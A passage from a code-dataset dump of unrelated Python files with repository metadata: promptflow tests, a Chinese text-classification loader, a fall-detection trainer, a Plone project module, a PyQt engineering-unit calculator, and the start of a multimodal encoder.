def test_pf_test_with_streaming_output(self):\n flow_path = Path(f\"{FLOWS_DIR}/chat_flow_with_stream_output\")\n result = _client.test(flow=flow_path)\n chat_output = result[\"answer\"]\n assert isinstance(chat_output, GeneratorType)\n assert \"\".join(chat_output)\n\n flow_path = Path(f\"{FLOWS_DIR}/basic_with_builtin_llm_node\")\n result = _client.test(flow=flow_path)\n chat_output = result[\"output\"]\n assert isinstance(chat_output, str)\n\n def test_pf_test_node(self):\n inputs = {\"classify_with_llm.output\": '{\"category\": \"App\", \"evidence\": \"URL\"}'}\n flow_path = Path(f\"{FLOWS_DIR}/web_classification\").absolute()\n\n result = _client.test(flow=flow_path, inputs=inputs, node=\"convert_to_dict\")\n assert all([key in FLOW_RESULT_KEYS for key in result])\n\n def test_pf_test_flow_with_variant(self):\n inputs = {\"url\": \"https://www.youtube.com/watch?v=o5ZQyXaAv1g\", \"answer\": \"Channel\", \"evidence\": \"Url\"}\n\n result = _client.test(\n flow=f\"{FLOWS_DIR}/web_classification\", inputs=inputs, variant=\"${summarize_text_content.variant_1}\"\n )\n assert all([key in FLOW_RESULT_KEYS for key in result])\n\n @pytest.mark.skip(\"TODO this test case failed in windows and Mac\")\n def test_pf_test_with_additional_includes(self, caplog):\n with caplog.at_level(level=logging.WARNING, logger=LOGGER_NAME):\n inputs = {\"url\": \"https://www.youtube.com/watch?v=o5ZQyXaAv1g\", \"answer\": \"Channel\", \"evidence\": \"Url\"}\n result = _client.test(flow=f\"{FLOWS_DIR}/web_classification_with_additional_include\", inputs=inputs)\n duplicate_file_content = \"Found duplicate file in additional includes\"\n assert any([duplicate_file_content in record.message for record in caplog.records])\n assert all([key in FLOW_RESULT_KEYS for key in result])\n\n inputs = {\"classify_with_llm.output\": '{\"category\": \"App\", \"evidence\": \"URL\"}'}\n result = _client.test(flow=f\"{FLOWS_DIR}/web_classification\", inputs=inputs, node=\"convert_to_dict\")\n assert all([key in FLOW_RESULT_KEYS for key in result])\n\n # Test additional includes don't exist\n with pytest.raises(ValueError) as e:\n _client.test(flow=f\"{FLOWS_DIR}/web_classification_with_invalid_additional_include\")\n assert \"Unable to find additional include ../invalid/file/path\" in str(e.value)\n\n def test_pf_flow_test_with_symbolic(self, prepare_symbolic_flow):\n inputs = {\"url\": \"https://www.youtube.com/watch?v=o5ZQyXaAv1g\", \"answer\": \"Channel\", \"evidence\": \"Url\"}\n result = _client.test(flow=f\"{FLOWS_DIR}/web_classification_with_additional_include\", inputs=inputs)\n assert all([key in FLOW_RESULT_KEYS for key in result])\n\n inputs = {\"classify_with_llm.output\": '{\"category\": \"App\", \"evidence\": \"URL\"}'}\n result = _client.test(flow=f\"{FLOWS_DIR}/web_classification\", inputs=inputs, node=\"convert_to_dict\")\n assert all([key in FLOW_RESULT_KEYS for key in result])\n\n def test_pf_flow_test_with_exception(self, capsys):\n # Test flow with exception\n inputs = {\"url\": \"https://www.youtube.com/watch?v=o5ZQyXaAv1g\", \"answer\": \"Channel\", \"evidence\": \"Url\"}\n flow_path = Path(f\"{FLOWS_DIR}/web_classification_with_exception\").absolute()\n\n with pytest.raises(UserErrorException) as exception:\n _client.test(flow=flow_path, inputs=inputs)\n assert \"Execution failure in 'convert_to_dict': (Exception) mock exception\" in str(exception.value)\n\n # Test node with exception\n inputs = {\"classify_with_llm.output\": '{\"category\": \"App\", \"evidence\": \"URL\"}'}\n with pytest.raises(Exception) as exception:\n _client.test(flow=flow_path, inputs=inputs, node=\"convert_to_dict\")\n output = capsys.readouterr()\n assert \"convert_to_dict.py\" in output.out\n assert \"mock exception\" in str(exception.value)\n\n def test_node_test_with_connection_input(self):\n flow_path = Path(f\"{FLOWS_DIR}/basic-with-connection\").absolute()\n inputs = {\n \"connection\": \"azure_open_ai_connection\",\n \"hello_prompt.output\": \"Write a simple Hello World! \"\n \"program that displays the greeting message when executed.\",\n }\n result = _client.test(\n flow=flow_path,\n inputs=inputs,\n node=\"echo_my_prompt\",\n environment_variables={\"API_TYPE\": \"${azure_open_ai_connection.api_type}\"},\n )\n assert result\n\n def test_pf_flow_with_aggregation(self):\n flow_path = Path(f\"{FLOWS_DIR}/classification_accuracy_evaluation\").absolute()\n inputs = {\"variant_id\": \"variant_0\", \"groundtruth\": \"Pdf\", \"prediction\": \"PDF\"}\n result = _client._flows._test(flow=flow_path, inputs=inputs)\n assert \"calculate_accuracy\" in result.node_run_infos\n assert result.run_info.metrics == {\"accuracy\": 1.0}\n\n def test_pf_test_with_non_english_input(self):\n result = _client.test(flow=f\"{FLOWS_DIR}/flow_with_non_english_input\")\n assert result[\"output\"] == \"Hello 日本語\"\n","repo_name":"Indie365/promptflow","sub_path":"src/promptflow/tests/sdk_cli_test/e2etests/test_flow_test.py","file_name":"test_flow_test.py","file_ext":"py","file_size_in_byte":7244,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5151445469","text":"\nimport os\nimport re\nimport jieba\nimport time\nimport numpy as np\n\njieba.enable_parallel() # jieba支持多进程\n\ntoken = \"[0-9\\s+\\.\\!\\/_,$%^*()?;;:【】+\\\"\\'\\[\\]\\\\]+|[+——!,;:。?《》、~@#¥%……&*()“”.=-]+\"\nlabels_index = {} # 记录分类标签的序号\nstopwords = set(open('dict/stop_words.txt', encoding='utf-8').read().split()) # 停用词\n\n\n# for scikit part\n\ndef preprocess(text):\n text1 = re.sub(' ', ' ', text)\n str_no_punctuation = re.sub(token, ' ', text1) # 去掉标点\n text_list = list(jieba.cut(str_no_punctuation)) # 分词列表\n text_list = [item for item in text_list if item != ' '] # 去掉空格\n return ' '.join(text_list)\n\n\ndef load_datasets():\n # should run corpus_split.py first\n\n base_dir = 'data/'\n X_data = {'train':[], 'test':[]}\n y = {'train':[], 'test':[]}\n for type_name in ['train', 'test']:\n corpus_dir = os.path.join(base_dir, type_name)\n for label in os.listdir(corpus_dir):\n label_dir = os.path.join(corpus_dir, label)\n file_list = os.listdir(label_dir)\n print(\"label: {}, len: {}\".format(label, len(file_list)))\n\n for fname in file_list:\n file_path = os.path.join(label_dir, fname)\n with open(file_path, encoding='gb2312', errors='ignore') as text_file:\n text_content = preprocess(text_file.read())\n X_data[type_name].append(text_content)\n y[type_name].append(label)\n\n print(\"{} corpus len: {}\\n\".format(type_name, len(X_data[type_name])))\n \n return X_data['train'], y['train'], X_data['test'], y['test']\n\n\n# for keras part\n\ndef preprocess_keras(text):\n text1 = re.sub(' ', ' ', text)\n str_no_punctuation = re.sub(token, ' ', text1) # 去掉标点\n text_list = list(jieba.cut(str_no_punctuation)) # 分词列表\n text_list = [item for item in text_list if item != ' ' and item not in stopwords] # 去掉空格和停用词\n return ' '.join(text_list)\n\n\ndef load_raw_datasets(): \n labels = []\n texts = []\n base_dir = 'CN_Corpus/SogouC.reduced/Reduced'\n t1 = time.time()\n for cate_index, label in enumerate(os.listdir(base_dir)):\n label_dir = os.path.join(base_dir, label)\n file_list = os.listdir(label_dir)\n labels_index[label] = cate_index # 记录分类标签的整数标号\n print(\"label: {}, len: {}\".format(label, len(file_list)))\n\n for fname in file_list:\n f = open(os.path.join(label_dir, fname), encoding='gb2312', errors='ignore')\n texts.append(preprocess_keras(f.read()))\n f.close()\n labels.append(labels_index[label])\n \n t2 = time.time()\n tm_cost = t2-t1\n print('\\nDone. {} total categories, {} total docs. cost {} seconds.'.format(len(os.listdir(base_dir)), len(texts), tm_cost))\n return texts, labels\n\ndef load_pre_trained():\n # load pre-trained embedding model\n embeddings_index = {}\n with open('Embedding/sgns.sogou.word') as f:\n _, embedding_dim = f.readline().split() \n for line in f:\n values = line.split()\n word = values[0]\n coefs = np.asarray(values[1:], dtype='float32')\n embeddings_index[word] = coefs\n\n print('Found %s word vectors, dimension %s' % (len(embeddings_index), embedding_dim))\n return embeddings_index","repo_name":"lijqhs/text-classification-cn","sub_path":"load_data.py","file_name":"load_data.py","file_ext":"py","file_size_in_byte":3409,"program_lang":"python","lang":"en","doc_type":"code","stars":118,"dataset":"github-code","pt":"53"} +{"seq_id":"37776661199","text":"import pandas as pd\nimport torch\nimport torch.nn.functional as F\nimport numpy as np\nimport torch\nfrom torch import nn\nfrom torch.nn import Sequential\nimport torch.optim as optim\nfrom random import shuffle\n\n\ndef get_data(file):\n inputs = []\n labels = []\n with open(file) as file:\n df = pd.read_csv(file, header=None)\n x = df.iloc[:, 1:].values\n y = df.iloc[:, 0].values\n for i in range(len(x)):\n inputs.append(x[i])\n for j in range(len(y)):\n a = []\n if(y[j]==\"fall\"):\n y[j]=1\n else:\n y[j]=0\n a.append(y[j])\n labels.append(a)\n return inputs,labels\n\ninputs,outputs=get_data(\"data/fall_vs_up.csv\")\nprint(inputs[1])\nprint(outputs[1])\n\n\nclass MLP(nn.Module):\n def __init__(self):\n super(MLP, self).__init__()\n self.fc = Sequential(\n nn.Linear(99, 10),\n nn.ReLU(),\n nn.Linear(10,2)\n )\n\n def forward(self, x):\n x = self.fc(x)\n return x\n\nmodel=MLP()\n\ncriterion = nn.CrossEntropyLoss()\noptimizer = optim.Adam(model.parameters(), lr=1e-4)\n# optimizer = optim.SGD(model.parameters(), lr=1e-4, momentum=0.9)\nEPOCH = 50\n\nfor epoch in range(EPOCH):\n step = 0\n loss_one = 0\n list_shuffle = [i for i in range(len(inputs))]\n shuffle(list_shuffle)\n for i in list_shuffle:\n train_loss = 0\n x = inputs[i]\n y = outputs[i]\n y = torch.tensor(y)\n x = torch.tensor(x).unsqueeze(0).to(torch.float32)\n output = model(x)\n loss = criterion(output, y)\n loss.backward()\n optimizer.step()\n train_loss += loss.item()\n\n train_loss = train_loss / len(inputs)\n\n print('Epoch: {} \\t Training Loss:{:.6f}'.format(epoch + 1, train_loss))\n\ntorch.save(model.state_dict(),\"checkpoint/fall_vs_up_dict.pth\")","repo_name":"tuyenldhust/Fall_Detection","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":1870,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"16504870297","text":"import pytest\nfrom tests.context import cli\n\n\n@pytest.fixture(scope=\"module\")\ndef parser():\n return cli.make_parser()\n\n\ndef test_cli_parse_args(parser):\n return\n argvs = [\n [],\n [\"-v\"],\n [\"-vv\"],\n [\"-q\"],\n [\"interactive\"],\n [\"list\"],\n [\"-v\", \"list\"],\n [\"-vv\", \"list\"],\n [\"report\"],\n [\"update\"],\n [\"update\", \"-S\", \"T\", \"100\", \"1/3/2020\"],\n [\"update\", \"-A\", \"T\", \"100\", \"1/4/2020\"],\n [\"update\", \"-R\", \"T\", \"100\", \"1/5/2020\"],\n ]\n for argv in argvs:\n assert parser.parse_args(argv)\n\n\ndef test_cli_interactive(parser):\n pass\n\n\ndef test_cli_list(parser, sample_portfolio):\n argv = [\"list\"]\n args = parser.parse_args(argv)\n assert callable(args.func)\n assert args.verbosity == 0\n assert args.func(args, sample_portfolio) == \"\\t\".join(\n sample_portfolio.holdings.columns\n )\n\n\ndef test_cli_report(parser, sample_portfolio):\n argv = [\"report\"]\n args = parser.parse_args(argv)\n assert args.verbosity == 1\n assert not args.email\n assert callable(args.func)\n # assert type(args.func(args, sample_portfolio)) == report.Report\n\n\ndef test_cli_update(parser):\n pass\n","repo_name":"ThomasStivers/portfolio","sub_path":"tests/test_cli.py","file_name":"test_cli.py","file_ext":"py","file_size_in_byte":1212,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"21822021075","text":"from zope import interface\nfrom zope.interface import implements\nfrom zope.component import getUtility\n\nfrom archetypes.schemaextender.interfaces import ISchemaExtender\nfrom archetypes.schemaextender.field import ExtensionField\n\nfrom Products.CMFCore.utils import getToolByName\nfrom Products.Archetypes import public as atapi\n\nfrom p4a.subtyper import ISubtyper, interfaces as stifaces\n\nfrom bit.plone.fraglets.interfaces import IFolderResults\nfrom bit.plone.project.interfaces\\\n import IProject, IProjectContacts, IProjectInfo,\\\n IProjectNews, IProjectLinks, IProjectEvents, IProjectMedia,\\\n IProjectPartners\nfrom bit.plone.project.subtypes.interfaces\\\n import IProjectSubtype,\\\n IProjectNewsSubtype, IProjectLinksSubtype,\\\n IProjectEventsSubtype, IProjectPartnersSubtype\n\n\nclass ExStringField(ExtensionField, atapi.StringField):\n \"\"\"A trivial field.\"\"\"\n\n\nclass ExTextField(ExtensionField, atapi.TextField):\n \"\"\"A trivial field.\"\"\"\n\n\nclass ExLinesField(ExtensionField, atapi.LinesField):\n \"\"\"A trivial field.\"\"\"\n\nproject_fields = [\n ExStringField(\n \"project_status\",\n default='active',\n mode='rw',\n read_permission='zope.View',\n write_permission='cmf.ModifyPortalContent',\n vocabulary_factory='bit.plone.project.vocabulary.ProjectStatus',\n widget=atapi.SelectionWidget(\n label='Project Status',\n label_msgid='label_project_status',\n description=\"Please enter the primary \"\\\n + \"STATUS for this project, leave blank to use this STATUS\",\n description_msgid='help_project_status',\n i18n_domain='plone',\n ),\n ),\n ExLinesField(\n \"project_features\",\n default='',\n mode='rw',\n read_permission='zope.View',\n write_permission='cmf.ModifyPortalContent',\n widget=atapi.LinesWidget(\n label='Project features',\n label_msgid='label_project_features',\n description=\"Please enter the paths \"\\\n + \"to featured content for this project\",\n description_msgid='help_project_features',\n i18n_domain='plone',\n ),\n ),\n ]\n\n\nclass ProjectExtender(object):\n implements(ISchemaExtender)\n fields = project_fields\n\n def __init__(self, context):\n self.context = context\n\n def getFields(self):\n return self.fields\n\n\nclass Project(object):\n implements(IProject)\n\n def __init__(self, context):\n self.context = context\n\n def __eq__(self, other):\n if self.context == other.context:\n return True\n return False\n\n def get_uid(self):\n return self.context.UID()\n uid = property(get_uid)\n\n def get_id(self):\n return self.context.getId()\n id = property(get_id)\n\n def get_title(self):\n return self.context.Title()\n\n def set_title(self, title):\n return self.context.setTitle(title)\n title = property(get_title, set_title)\n\n def get_project_folder(self, folderid):\n if hasattr(self.context, folderid):\n # this should return an adapted folder...\n return self.context[folderid]\n\n def get_project_folders(self, non_empty=False):\n portal_catalog = getToolByName(self.context, 'portal_catalog')\n catalog_results = portal_catalog.searchResults(\n show_inactive=False,\n show_all=False,\n exclude_from_nav=False)\n for folder in [\n x for x\n in portal_catalog.searchResults(\n is_folderish=True,\n exclude_from_nav=False,\n path={\n 'query': self.get_path(),\n 'depth': 1},\n sort_on='getObjPositionInParent')\n ]:\n if non_empty:\n has_children = [\n x.getPath() for x\n in catalog_results\n if not x.getPath() == folder.getPath()\n and x.getPath().startswith(folder.getPath())\n and not '/' in x.getPath().split(\n folder.getPath())[1].lstrip('/')]\n if has_children:\n yield folder.getId\n else:\n yield folder.getId\n\n def get_project_status(self):\n project_status = self.context.Schema(\n )['project_status'].get(self.context)\n return project_status\n\n def set_project_status(self, status):\n self.context.Schema(\n )['project_status'].set(self.context, status)\n status = property(get_project_status, set_project_status)\n\n def get_path(self):\n return '/'.join(self.context.getPhysicalPath())\n path = property(get_path)\n\n def get_info(self):\n return IProjectInfo(self.context)\n info = property(get_info)\n\n def get_media(self):\n return IProjectMedia(self.context)\n media = property(get_media)\n\n def add_contacts_folder(self):\n if not 'contacts' in self.context:\n self.context.invokeFactory('Folder', 'contacts')\n if not IProjectContacts(self.context['contacts'], None):\n subtyper = getUtility(ISubtyper)\n subtyper.change_type(\n self.context['contacts'],\n 'bit.plone.project.ProjectContacts')\n self.context['contacts'].setTitle('Contacts')\n\n def add_news_folder(self):\n if not 'news' in self.context:\n self.context.invokeFactory('Folder', 'news')\n if not IProjectNews(self.context['news'], None):\n subtyper = getUtility(ISubtyper)\n subtyper.change_type(\n self.context['news'],\n 'bit.plone.project.ProjectNews')\n self.context['news'].setTitle('News')\n\n def add_links_folder(self):\n if not 'links' in self.context:\n self.context.invokeFactory('Folder', 'links')\n if not IProjectLinks(self.context['links'], None):\n subtyper = getUtility(ISubtyper)\n subtyper.change_type(\n self.context['links'],\n 'bit.plone.project.ProjectLinks')\n self.context['links'].setTitle('Links')\n\n def add_partners_folder(self):\n if not 'partners' in self.context:\n self.context.invokeFactory('Folder', 'partners')\n if not IProjectPartners(self.context['partners'], None):\n subtyper = getUtility(ISubtyper)\n subtyper.change_type(\n self.context['partners'],\n 'bit.plone.project.ProjectPartners')\n self.context['partners'].setTitle('Partners')\n\n def add_events_folder(self):\n if not 'events' in self.context:\n self.context.invokeFactory('Folder', 'events')\n if not IProjectEvents(self.context['events'], None):\n subtyper = getUtility(ISubtyper)\n subtyper.change_type(\n self.context['events'],\n 'bit.plone.project.ProjectEvents')\n self.context['events'].setTitle('Events')\n\n def add_info_folder(self):\n if not 'info' in self.context:\n self.context.invokeFactory('Folder', 'info')\n if not IProjectInfo(self.context['info'], None):\n subtyper = getUtility(ISubtyper)\n subtyper.change_type(\n self.context['info'],\n 'bit.plone.project.ProjectInfo')\n self.context['info'].setTitle('Info')\n\n def add_media_folder(self):\n if not 'media' in self.context:\n self.context.invokeFactory('Folder', 'media')\n if not IProjectMedia(self.context['media'], None):\n subtyper = getUtility(ISubtyper)\n subtyper.change_type(\n self.context['media'],\n 'bit.plone.project.ProjectMedia')\n self.context['media'].setTitle('Media')\n\n\nclass ProjectNews(object):\n implements(IProjectNews)\n\n def __init__(self, context):\n self.context = context\n\n def get_news(self, **kwa):\n content_filter = {}\n content_filter['path'] = dict(\n query=self.get_path(),\n depth=-1)\n content_filter['portal_type'] = 'News Item'\n content_filter['sort_on'] = 'effective'\n content_filter['sort_order'] = 'descending'\n max_items = kwa.get('max_items')\n if int(max_items or 0) == -1:\n return []\n return IFolderResults(self.context).get_results(\n contentFilter=content_filter,\n **kwa)\n\n def get_path(self):\n return '/'.join(self.context.getPhysicalPath())\n\n\nclass ProjectEvents(object):\n implements(IProjectEvents)\n\n def __init__(self, context):\n self.context = context\n\n def get_events(self):\n pass\n\n\nclass ProjectLinks(object):\n implements(IProjectLinks)\n\n def __init__(self, context):\n self.context = context\n\n def get_links(self, **kwa):\n content_filter = {}\n content_filter['path'] = dict(\n query=self.get_path(),\n depth=-1)\n content_filter['portal_type'] = 'Link'\n content_filter['sort_on'] = 'effective'\n kwa['sort_on'] = 'effective'\n max_items = kwa.get('max_items')\n if int(max_items or 0) == -1:\n return []\n return IFolderResults(self.context).get_results(\n contentFilter=content_filter,\n **kwa)\n\n def get_path(self):\n return '/'.join(self.context.getPhysicalPath())\n\n\nclass ProjectPartners(object):\n implements(IProjectPartners)\n\n def __init__(self, context):\n self.context = context\n\n def get_partners(self):\n pass\n\n\nclass ProjectSubtype(object):\n \"\"\"A descriptor for the ultra doc subtype.\n >>> descriptor = UltraDocDescriptor()\n >>> descriptor.title\n u'Project'\n \"\"\"\n interface.implements(stifaces.IPortalTypedFolderishDescriptor)\n title = u'Project'\n description = u'A project'\n type_interface = IProjectSubtype\n for_portal_type = 'Folder'\n icon = 'trinity-favicon-tiny.png'\n default_view = 'info'\n permission = 'bit.plone.project.AddProject'\n\n\nclass ProjectNewsSubtype(object):\n \"\"\"A descriptor for the ultra doc subtype.\n >>> descriptor = UltraDocDescriptor()\n >>> descriptor.title\n u'Project'\n \"\"\"\n interface.implements(stifaces.IPortalTypedFolderishDescriptor)\n title = u'Project news'\n description = u'Project news, URLs etc'\n type_interface = IProjectNewsSubtype\n for_portal_type = 'Folder'\n icon = 'trinity-favicon-tiny.png'\n default_view = '@@atomic-view'\n allowed_types = ['Link']\n permission = 'bit.plone.project.AddProjectNews'\n\n\nclass ProjectEventsSubtype(object):\n \"\"\"A descriptor for the ultra doc subtype.\n >>> descriptor = UltraDocDescriptor()\n >>> descriptor.title\n u'Project'\n \"\"\"\n interface.implements(stifaces.IPortalTypedFolderishDescriptor)\n title = u'Project events'\n description = u'Project events, URLs etc'\n type_interface = IProjectEventsSubtype\n for_portal_type = 'Folder'\n icon = 'trinity-favicon-tiny.png'\n default_view = '@@atomic-view'\n allowed_types = ['Link']\n permission = 'bit.plone.project.AddProjectEvents'\n\n\nclass ProjectLinksSubtype(object):\n \"\"\"A descriptor for the ultra doc subtype.\n >>> descriptor = UltraDocDescriptor()\n >>> descriptor.title\n u'Project'\n \"\"\"\n interface.implements(stifaces.IPortalTypedFolderishDescriptor)\n title = u'Project links'\n description = u'Project links, URLs etc'\n type_interface = IProjectLinksSubtype\n for_portal_type = 'Folder'\n icon = 'trinity-favicon-tiny.png'\n default_view = '@@atomic-view'\n allowed_types = ['Link']\n permission = 'bit.plone.project.AddProjectLinks'\n\n\nclass ProjectPartnersSubtype(object):\n \"\"\"A descriptor for the ultra doc subtype.\n >>> descriptor = UltraDocDescriptor()\n >>> descriptor.title\n u'Project'\n \"\"\"\n interface.implements(stifaces.IPortalTypedFolderishDescriptor)\n title = u'Project partners'\n description = u'Project partners, URLs etc'\n type_interface = IProjectPartnersSubtype\n for_portal_type = 'Folder'\n icon = 'trinity-favicon-tiny.png'\n default_view = '@@atomic-view'\n allowed_types = ['Link']\n permission = 'bit.plone.project.AddProjectPartners'\n\n\nclass ProjectLinksResultsDelegation(object):\n\n def __init__(self, context):\n self.context = context\n\n def getResults(self, **kwa):\n return IProjectLinks(self.context).get_links(**kwa)\n\n\nclass ProjectNewsResultsDelegation(object):\n\n def __init__(self, context):\n self.context = context\n\n def getResults(self, **kwa):\n return IProjectNews(self.context).get_news(**kwa)\n","repo_name":"bithub/bit.plone.project","sub_path":"bit/plone/project/subtypes/projects.py","file_name":"projects.py","file_ext":"py","file_size_in_byte":12687,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"33074622003","text":"import traceback\nfrom math import sin, asin, cos, acos, tan, atan, pi, e, log, log10, sqrt\nimport webbrowser\n\nfrom PyQt5 import QtGui\nfrom PyQt5.QtWidgets import QMessageBox\nfrom PyQt5.QtCore import Qt\nfrom PyQt5.QtWidgets import (QApplication, QGridLayout, QLayout, QLineEdit,\n QSizePolicy, QToolButton, QWidget, QLabel, QTextBrowser, QTextEdit, QCheckBox, QComboBox)\nfrom PyQt5.QtGui import QClipboard\n \nfrom appinfo import version, appname, about, hidden_features\nfrom units import *\n\nfrom units_description import unit_description\nfrom imperial_lengh_format import imperial_lengh_format\n\n#---------------------------------------------------------------------\n\nunit_list = ['kg', 't', 'lb', 'UKton', 'USton']\nunit_list += ['um', 'mm', 'cm', 'dm', 'm', 'km', 'inch', 'ft', 'yd', 'mile']\nunit_list += ['mm2', 'cm2','m2', 'ha', 'inch2', 'ft2', 'yd2']\nunit_list += ['mm3', 'cm3', 'dm3','m3', 'inch3', 'ft3']\nunit_list += ['mm4', 'cm4','m4', 'inch4', 'ft4']\nunit_list += ['N', 'kN','lbf', 'kip']\nunit_list += ['Nm', 'kNm','lbfinch', 'lbfft', 'kipinch', 'kipft']\nunit_list += ['Pa', 'kN/m2', 'kPa','MPa', 'bar', 'GPa', 'psi', 'ksi', 'psf', 'ksf']\nunit_list += ['kN/m', 'lbf/ft', 'plf', 'kip/ft', 'klf']\nunit_list += ['kN/m3', 'lbf/inch3', 'kip/ft3' ,'pci' ,'pcf', 'kcf']\nunit_list += ['kg/m3', 't/m3', 'lb/ft3',]\nunit_list += ['s', 'h']\n\nextra_units_list = ['ft_inch'] #those units has no button\n\nuser_used_units = ['kg', 'm','m2', 'm3', 'm4', 'kN', 'kNm', 'kPa', 'kN/m', 'kN/m3', 'kg/m3', 's']\n\ndef are_the_same_unit(val1, val2):\n try:\n val1 + val2\n return True\n except:\n return False\n\ndef unit_color(val):\n if are_the_same_unit(val, kg):\n colour = \"background-color: rgb(251,155,111)\"\n elif are_the_same_unit(val, m):\n colour = \"background-color: rgb(251,239,112)\"\n elif are_the_same_unit(val, m2):\n colour = \"background-color: rgb(134,250,128)\"\n elif are_the_same_unit(val, m3):\n colour = \"background-color: rgb(129,248,242)\"\n elif are_the_same_unit(val, m4):\n colour = \"background-color: rgb(183,193,251)\"\n elif are_the_same_unit(val, N):\n colour = \"background-color: rgb(250,183,246)\"\n elif are_the_same_unit(val, Nm):\n colour = \"background-color: rgb(251,155,111)\"\n elif are_the_same_unit(val, Pa):\n colour = \"background-color: rgb(251,239,112)\"\n elif are_the_same_unit(val, N/m):\n colour = \"background-color: rgb(134,250,128)\"\n elif are_the_same_unit(val, N/m3):\n colour = \"background-color: rgb(129,248,242)\"\n elif are_the_same_unit(val, kg/m3):\n colour = \"background-color: rgb(183,193,251)\"\n else:\n colour = \"background-color: rgb(250,183,246)\"\n return colour\n\n#---------------------------------------------------------------------\n\nclass Button(QToolButton):\n def __init__(self, text, parent=None):\n super(Button, self).__init__(parent)\n self.setSizePolicy(QSizePolicy.Expanding, QSizePolicy.Preferred)\n self.setText(text)\n\n def sizeHint(self):\n size = super(Button, self).sizeHint()\n size.setHeight(size.height() + 15)\n size.setWidth(max(size.width(), size.height()))\n return size\n \ndef createButton(text, member):\n button = Button(text)\n button.clicked.connect(member)\n return button\n\n#---------------------------------------------------------------------\n\nans = 0\n\nreport_default_text = 'Here you can write simple report. Use the |Add to report| button to get results here. Enjoy!'\n\nclass MAINWINDOW(QWidget):\n NumDigitButtons = 10\n \n def __init__(self, parent=None):\n super(MAINWINDOW, self).__init__(parent)\n \n #---------\n self.result = 0\n self.block = False\n\n #---------\n self.display = QLineEdit('')\n self.display.setReadOnly(False)\n self.display.setAlignment(Qt.AlignRight)\n font = self.display.font()\n font.setPointSize(font.pointSize() + 4)\n self.display.setFont(font)\n self.display.textChanged.connect(self.auto_calculate)\n \n self.display_res = QLineEdit('')\n self.display_res.setReadOnly(True)\n self.display_res.setAlignment(Qt.AlignRight)\n font = self.display_res.font()\n font.setPointSize(font.pointSize() + 4)\n self.display_res.setFont(font)\n \n self.warnings = QLabel()\n self.warnings.setText(\"-\")\n self.warnings.setAlignment(Qt.AlignRight)\n \n self.autoCheckBox = QCheckBox('auto eval')\n self.autoCheckBox.setToolTip('if checked, every time you change the expression it will be evaluated')\n self.autoreportCheckBox = QCheckBox('auto add to report')\n self.autoreportCheckBox.setToolTip('if checked, every time you use |eval| or |=| result will be added to report')\n self.errorCheckBox = QCheckBox('error msg')\n self.errorCheckBox.setToolTip('if checked, you will get info why ERROR occurred')\n self.add_to_reportButton = createButton(\"add to report\",self.add_to_report)\n self.unit_ComboBox = QComboBox()\n self.unit_ComboBox.currentIndexChanged.connect(self.user_unit_changed)\n self.textEditor = QTextEdit()\n\n self.digitButtons = []\n for i in range(self.NumDigitButtons):\n self.digitButtons.append(createButton(str(i),\n self.basicClicked))\n\n self.unitButtons = []\n for i in unit_list:\n self.unitButtons.append(createButton(str(i),\n self.unitClicked))\n\n self.eButton = createButton(\"E\", self.basicClicked)\n self.eButton.setToolTip('E-notation (1E2 = 100, 1E-2 = 0.01 ..)')\n self.pointButton = createButton(\".\", self.basicClicked)\n self.deleteButton = createButton(\"DEL\",self.backspaceClicked)\n self.clearButton = createButton(\"C\", self.clear)\n self.divisionButton = createButton(\" / \",self.basicClicked)\n self.timesButton = createButton(\" * \",self.basicClicked)\n self.minusButton = createButton(\" - \", self.basicClicked)\n self.plusButton = createButton(\" + \", self.basicClicked)\n self.squareRootButton = createButton(\"^\",self.basicClicked)\n self.brackedopenButton = createButton(\"(\",self.basicClicked)\n self.brackedcloseButton = createButton(\")\",self.basicClicked)\n self.evallButton = createButton(\"eval\", self.evalClicked)\n self.evallButton.setToolTip('it evaluate expression')\n self.ansButton = createButton(\"ans\", self.basicClicked)\n self.ansButton.setToolTip('last answer key - it holds the result after the equals (=) key was last pressed')\n self.equalButton = createButton(\"=\", self.equalClicked)\n self.equalButton.setToolTip('it evaluate expression and move result to ans')\n self.infoButton = createButton(\"app info\", self.info_app)\n self.cb1Button = createButton(\"cb_res>>\", self.copy_res_to_clipboard)\n self.cb1Button.setToolTip('copy only result text to clipboard')\n self.cb2Button = createButton(\"cb_eq>>\", self.copy_equ_to_clipboard)\n self.cb2Button.setToolTip('copy all equation text to clipboard')\n self.cbinButton = createButton(\"< 0\n\t\tif self.to_pool:\n\t\t\tself.image_pooler = get_image_pooler(d_im, _config)\n\t\t\tif self.text_encoder is not None:\n\t\t\t\tself.text_pooler = get_text_pooler(d_txt, _config)\n\t\t# import pudb; pu.db\n\t\tself.fuser = get_fuser(_config)\n\n\tdef encode(self, batch):\n\t\tX_encode = dict()\n\n\t\tX_image = self.encode_image(batch)\n\t\tX_encode.update({'image': X_image})\n\n\t\t[\n\t\t\tX_encode.update({k: self.encode_text(batch, k)})\n\t\t\tfor k in TEXT_ENCODER_KEYS if k in batch\n\t\t]\n\t\tif self.fuser is not None:\n\t\t\tX_encode = self.fuser(X_encode)\n\t\t[\n\t\t\tX_encode.update({k: {\n\t\t\t\tf'{k}_id': batch[f'{k}_id'], \n\t\t\t\tf'{k}_mask': batch[f'{k}_mask']\n\t\t\t}})\n\t\t\tfor k in TEXT_DECODER_KEYS if f'{k}_id' in batch\n\t\t]\n\t\treturn X_encode\n\n\tdef encode_image(self, batch):\n\t\timages = batch['image']\n\t\tX_encode = dict()\n\t\tX, X_cls = self.image_encoder(images)\n\t\tif self.to_pool:\n\t\t\tX, ret = self.image_pooler(X_cls, X)\n\t\t\tX_encode.update(ret)\n\t\tX_encode['embedding'] = X\n\t\tX_encode['cls_embedding'] = X_cls\n\t\tX_encode['mask'] = torch.ones(X.shape[:2], device=X.device).long()\n\t\treturn X_encode\n\n\tdef encode_text(self, batch, k):\n\t\ttext_id, text_mask = batch[f'{k}_id'], batch[f'{k}_mask']\n\t\tX_encode = {\n\t\t\tf'{k}_id': text_id,\n\t\t\tf'{k}_mask': text_mask\n\t\t}\n\t\tif self.text_encoder is None:\n\t\t\treturn X_encode\n\t\telif isinstance(self.text_encoder, T5Adapter):\n\t\t\tX = 